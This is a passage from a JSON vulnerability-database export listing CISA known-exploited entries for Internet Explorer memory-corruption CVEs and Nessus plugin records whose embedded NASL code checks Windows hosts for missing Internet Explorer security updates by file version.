"2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26411"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-26411", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-07-21T17:22:44", "description": "Microsoft Internet Explorer contains a memory corruption vulnerability which can allow for remote code execution in the context of the current user.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": 
"HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Microsoft Internet Explorer Scripting Engine Memory Corruption Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1380"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2020-1380", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-05-18T15:25:30", "description": "The Internet Explorer installation on the remote host is missing a security update. It is, therefore, affected by the following vulnerability:\n\n - A memory corruption vulnerability exists. 
An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-26411)", "cvss3": {}, "published": "2021-03-09T00:00:00", "type": "nessus", "title": "Security Updates for Internet Explorer (March 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26411"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_MAR_INTERNET_EXPLORER.NASL", "href": "https://www.tenable.com/plugins/nessus/147228", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147228);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2021-26411\");\n script_xref(name:\"MSKB\", value:\"5000847\");\n script_xref(name:\"MSKB\", value:\"5000800\");\n script_xref(name:\"MSKB\", value:\"5000841\");\n script_xref(name:\"MSKB\", value:\"5000844\");\n script_xref(name:\"MSKB\", value:\"5000848\");\n script_xref(name:\"MSFT\", value:\"MS21-5000847\");\n script_xref(name:\"MSFT\", value:\"MS21-5000800\");\n script_xref(name:\"MSFT\", value:\"MS21-5000841\");\n script_xref(name:\"MSFT\", value:\"MS21-5000844\");\n script_xref(name:\"MSFT\", value:\"MS21-5000848\");\n script_xref(name:\"IAVA\", value:\"2021-A-0130-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0015\");\n\n script_name(english:\"Security Updates for Internet Explorer (March 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Internet Explorer installation on the remote host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Internet Explorer installation on 
the remote host is\nmissing a security update. It is, therefore, affected by the\nfollowing vulnerability:\n\n - A memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26411)\");\n # https://support.microsoft.com/en-us/topic/kb5000800-cumulative-security-update-for-internet-explorer-march-9-2021-b7b43be0-e9ef-48b6-b102-ed28fd89e0f2\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e8426b33\");\n # https://support.microsoft.com/en-us/topic/march-9-2021-kb5000841-monthly-rollup-3a2cced1-f436-40c3-a8a1-645f86759088\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8c5851d4\");\n # https://support.microsoft.com/en-us/topic/march-9-2021-kb5000844-monthly-rollup-d90d0eb1-6319-4a7e-97f6-68fbd306fd5a\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?177a5bc6\");\n # https://support.microsoft.com/en-us/topic/march-9-2021-kb5000847-monthly-rollup-8afa2933-e9da-4481-a0bc-18deb314974e\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?df958afd\");\n # https://support.microsoft.com/en-us/topic/march-9-2021-kb5000848-monthly-rollup-52f23db9-e1b0-4829-81b9-198fc82891a3\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5ff1e9b3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released the following security updates to address this issue: \n -KB5000800\n -KB5000841\n -KB5000844\n -KB5000847\n -KB5000848\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-26411\");\n\n 
script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS21-03';\nkbs = make_list(\n '5000800',\n '5000841',\n '5000844',\n '5000847',\n '5000848'\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_WARNING);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nos = get_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2', win7:'1', win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\nif (\"Vista\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 8.1 / Windows Server 2012 R2\n # Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"mshtml.dll\", version:\"11.0.9600.19963\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"5000800\") ||\n\n # Windows Server 2012\n # Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"mshtml.dll\", version:\"11.0.9600.19963\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"5000800\") ||\n\n # Windows 7 / Server 2008 R2\n # Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"mshtml.dll\", version:\"11.0.9600.19963\", 
min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"5000800\") ||\n\n # Windows Server 2008\n # Internet Explorer 9\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"mshtml.dll\", version:\"9.0.8112.21532\", min_version:\"9.0.8112.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"5000800\")\n)\n{\n report = '\\nNote: The fix for this issue is available in either of the following updates:\\n';\n report += ' - KB5000800 : Cumulative Security Update for Internet Explorer\\n';\n\n if(os == \"6.3\")\n {\n report += ' - KB5000848 : Windows 8.1 / Server 2012 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS21-03', kb:'5000848', report);\n }\n else if(os == \"6.2\")\n {\n report += ' - KB5000847 : Windows Server 2012 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS21-03', kb:'5000847', report);\n }\n else if(os == \"6.1\")\n {\n report += ' - KB5000841 : Windows 7 / Server 2008 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS21-03', kb:'5000841', report);\n }\n else if(os == \"6.0\")\n {\n report += ' - KB5000844 : Windows Server 2008 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS21-03', kb:'5000844', report);\n }\n\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n\n port = kb_smb_transport();\n\n hotfix_security_warning();\n hotfix_check_fversion_end();\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-09-27T15:31:11", "description": "The Internet Explorer installation on the remote host is missing a security update. It is, therefore, affected by the following vulnerability:\n\n - An memory corruption vulnerability exists. 
An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-26419)", "cvss3": {}, "published": "2021-05-11T00:00:00", "type": "nessus", "title": "Security Updates for Internet Explorer (May 2021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26411", "CVE-2021-26419"], "modified": "2021-05-27T00:00:00", "cpe": ["cpe:/a:microsoft:ie"], "id": "SMB_NT_MS21_MAY_INTERNET_EXPLORER.NASL", "href": "https://www.tenable.com/plugins/nessus/149386", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude('deprecated_nasl_level.inc');\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149386);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/05/27\");\n\n script_cve_id(\"CVE-2021-26419\");\n script_xref(name:\"MSKB\", value:\"5003210\");\n script_xref(name:\"MSFT\", value:\"MS21-5003210\");\n script_xref(name:\"MSKB\", value:\"5003233\");\n script_xref(name:\"MSFT\", value:\"MS21-5003233\");\n script_xref(name:\"MSKB\", value:\"5003209\");\n script_xref(name:\"MSFT\", value:\"MS21-5003209\");\n script_xref(name:\"MSKB\", value:\"5003165\");\n script_xref(name:\"MSKB\", value:\"5003208\");\n script_xref(name:\"MSFT\", value:\"MS21-5003165\");\n script_xref(name:\"MSFT\", value:\"MS21-5003208\");\n script_xref(name:\"IAVA\", value:\"2021-A-0224\");\n\n script_name(english:\"Security Updates for Internet Explorer (May 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Internet Explorer installation on the remote host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Internet Explorer installation on the remote host is\nmissing a security update. 
It is, therefore, affected by the\nfollowing vulnerability:\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26419)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/topic/5003165\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/topic/5003208\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/topic/5003209\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/topic/5003210\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/topic/5003233\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released the following security updates to address this issue: \n -KB5003165\n -KB5003208\n -KB5003209\n -KB5003210\n -KB5003233\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-26411\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/05/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/05/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/a:microsoft:ie\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nvar bulletin = 'MS21-05';\nvar kbs = make_list(\n '5003165',\n '5003208',\n '5003209',\n '5003210',\n '5003233'\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nvar os = get_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2', win7:'1', win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nvar productname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\nif (\"Vista\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nvar share = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 8.1 / Windows Server 2012 R2\n # Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"mshtml.dll\", version:\"11.0.9600.20016\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"5003165\") ||\n\n # Windows Server 2012\n # Internet Explorer 11\n 
hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"mshtml.dll\", version:\"11.0.9600.20016\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"5003165\") ||\n\n # Windows 7 / Server 2008 R2\n # Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"mshtml.dll\", version:\"11.0.9600.20016\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"5003165\") ||\n\n # Windows Server 2008\n # Internet Explorer 9\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"mshtml.dll\", version:\"9.0.8112.21542\", min_version:\"9.0.8112.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"5003165\")\n)\n{\n var report = '\\nNote: The fix for this issue is available in either of the following updates:\\n';\n report += ' - KB5003165 : Cumulative Security Update for Internet Explorer\\n';\n\n if(os == \"6.3\")\n {\n report += ' - KB5003209 : Windows 8.1 / Server 2012 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS21-05', kb:'5003209', report);\n }\n else if(os == \"6.2\")\n {\n report += ' - KB5003208 : Windows Server 2012 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS21-05', kb:'5003208', report);\n }\n else if(os == \"6.1\")\n {\n report += ' - KB5003233 : Windows 7 / Server 2008 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS21-05', kb:'5003233', report);\n }\n else if(os == \"6.0\")\n {\n report += ' - KB5003210 : Windows Server 2008 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS21-05', kb:'5003210', report);\n }\n\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n\n var port = kb_smb_transport();\n\n hotfix_security_hole();\n hotfix_check_fversion_end();\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:06:53", "description": "The Internet Explorer installation on the remote host is missing security updates. 
It is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way that the MSHTML engine improperly validates input. An attacker could execute arbitrary code in the context of the current user. (CVE-2020-1567)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-1380, CVE-2020-1570)", "cvss3": {}, "published": "2020-08-11T00:00:00", "type": "nessus", "title": "Security Updates for Internet Explorer (August 2020)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-1380", "CVE-2020-1567", "CVE-2020-1570"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_AUG_INTERNET_EXPLORER.NASL", "href": "https://www.tenable.com/plugins/nessus/139498", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(139498);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2020-1380\", \"CVE-2020-1567\", \"CVE-2020-1570\");\n script_xref(name:\"MSKB\", value:\"4571729\");\n script_xref(name:\"MSKB\", value:\"4571687\");\n script_xref(name:\"MSKB\", value:\"4571703\");\n script_xref(name:\"MSKB\", value:\"4571730\");\n script_xref(name:\"MSFT\", value:\"MS20-4571729\");\n script_xref(name:\"MSFT\", value:\"MS20-4571687\");\n script_xref(name:\"MSFT\", value:\"MS20-4571703\");\n script_xref(name:\"MSFT\", value:\"MS20-4571730\");\n script_xref(name:\"IAVA\", value:\"2020-A-0375-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0431-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0429-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0101\");\n\n script_name(english:\"Security Updates for Internet Explorer (August 2020)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Internet Explorer installation on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Internet Explorer installation on the remote host is\nmissing security updates. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that the MSHTML engine improperly validates input. An\n attacker could execute arbitrary code in the context of\n the current user. (CVE-2020-1567)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. 
An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-1380, CVE-2020-1570)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4571729/windows-7-update\");\n # https://support.microsoft.com/en-us/help/4571687/cumulative-security-update-for-internet-explorer\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fc565208\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4571703/windows-8-1-update\");\n # https://support.microsoft.com/en-us/help/4571730/windows-server-2008-update\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?87c93762\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released the following security updates to address this issue: \n -KB4571729\n -KB4571687\n -KB4571703\n -KB4571730\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1570\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/08/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/08/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n 
script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS20-08';\nkbs = make_list(\n'4571687',\n'4571736',\n'4571730',\n'4571703',\n'4571729'\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nos = get_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2', win7:'1', win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\nif (\"Vista\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 8.1 / Windows Server 2012 R2\n # Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"mshtml.dll\", version:\"11.0.9600.19780\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4571687\") ||\n\n # Windows Server 2012\n# Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"mshtml.dll\", 
version:\"11.0.9600.19780\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4571687\") ||\n \n # Windows 7 / Server 2008 R2\n # Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"mshtml.dll\", version:\"11.0.9600.19780\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4571687\") ||\n\n # Windows Server 2008\n # Internet Explorer 9\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"mshtml.dll\", version:\"9.0.8112.21475\", min_version:\"9.0.8112.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4571687\")\n)\n{\n report = '\\nNote: The fix for this issue is available in either of the following updates:\\n';\n report += ' - KB4571687 : Cumulative Security Update for Internet Explorer\\n';\n if(os == \"6.3\")\n {\n report += ' - KB4571703 : Windows 8.1 / Server 2012 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS20-08', kb:'4571703', report);\n }\n else if(os == \"6.2\")\n {\n report += ' - KB4571736 : Windows Server 2012 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS20-08', kb:'4571736', report);\n }\n else if(os == \"6.1\")\n {\n report += ' - KB4571729 : Windows 7 / Server 2008 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS20-08', kb:'4571729', report);\n }\n else if(os == \"6.0\")\n {\n report += ' - KB4571730 : Windows Server 2008 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS20-08', kb:'4571730', report);\n }\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-19T15:06:19", "description": "The remote Windows host is missing security update 5000856 or cumulative update 5000844. It is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability. 
An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-26861, CVE-2021-26877, CVE-2021-26893, CVE-2021-26894, CVE-2021-26895, CVE-2021-26897)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-1640, CVE-2021-26862, CVE-2021-26872, CVE-2021-26873, CVE-2021-26875, CVE-2021-26878, CVE-2021-26882, CVE-2021-26898, CVE-2021-26899, CVE-2021-26901, CVE-2021-27077)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-26411)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-24107)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-26896, CVE-2021-27063)", "cvss3": {}, "published": "2021-03-09T00:00:00", "type": "nessus", "title": "KB5000856: Windows Server 2008 March 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-1640", "CVE-2021-24107", "CVE-2021-26411", "CVE-2021-26861", "CVE-2021-26862", "CVE-2021-26872", "CVE-2021-26873", "CVE-2021-26875", "CVE-2021-26877", "CVE-2021-26878", "CVE-2021-26882", "CVE-2021-26893", "CVE-2021-26894", "CVE-2021-26895", "CVE-2021-26896", "CVE-2021-26897", "CVE-2021-26898", "CVE-2021-26899", "CVE-2021-26901", "CVE-2021-27063", "CVE-2021-27077"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_MAR_5000844.NASL", "href": 